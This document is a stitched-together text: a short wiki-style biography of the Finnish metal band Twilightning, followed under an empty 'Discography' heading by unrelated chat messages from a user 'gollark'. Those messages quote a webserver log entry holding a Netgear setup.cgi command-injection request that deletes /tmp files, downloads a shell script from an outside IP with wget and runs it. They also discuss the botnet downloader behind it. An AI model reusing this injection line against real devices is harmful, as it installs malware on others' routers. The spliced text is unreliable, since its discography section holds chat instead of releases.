Biography

Twilightning formed in 1998, consisting of guitarists Tommi Sartanen and Ville Wallenius, bassist Jussi Kainulainen, and drummer Juha Leskinen, with Tommi also on vocals. After releasing their first demo in 1999, they were joined by keyboardist Mikko Naukkarinen. Following the release of their second demo in 2001, Heikki Pöyhiä joined as lead singer. With this reinforced lineup, they release a third demo, which demonstrated their heavy influence from 1980s heavy metal.[1] Thanks to the interest this stirred, the group signed to Spinefarm Records, releasing their debut Delirium Veil in 2003, which drew comparisons to Edguy, Stratovarius, and Sonata Arctica.[2] They followed that up by releasing Plague-House Puppet Show in 2004, and the EP Bedlam in 2006.[3] Shortly after the release of Bedlam, Mikko Naukkarinen left the band.[4]

The latest release by Twilightning was Swinelords, released in 2007. It departed significantly from the distinctive power metal sounds of their previous releases, drifting more into the 80s hard rock genre. It features more relaxed vocals and guitar work, as well as a lesser extent of keyboards compared to previous albums.[5]

On 8 June 2009 Twilightning posted on its website that the band is no longer active. Lack of motivation to continue the band was the only reason that was posted.

Discography

gollark: So now I'm actually wondering if this was a botnet programmed by edgy teenagers, or something.
gollark: I downloaded one of *those* to look at, and ran `strings` on it, and as well as what look like HTTP requests (presumably trying to exploit other devices), there are sets of strings like these:
gollark: I looked at the `.sh` file there, and it appears to just be trying to download and execute a bunch of binaries for different architectures.
gollark: So I was looking through my webserver logs, as you do, and I found a bunch of requests like this among the typical exploit-spam or whatever it is:```<> 91.80.163.224 [21/Aug/2020:00:10:44 +0000] "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://45.95.168.247/Scylla.sh+-O+/tmp/Scylla.sh;sh+Scylla.sh&curpath=/&currentsetting.htm=1 HTTP/1.0" 200 31 "-" "-" ```
gollark: Oh right, Australia.
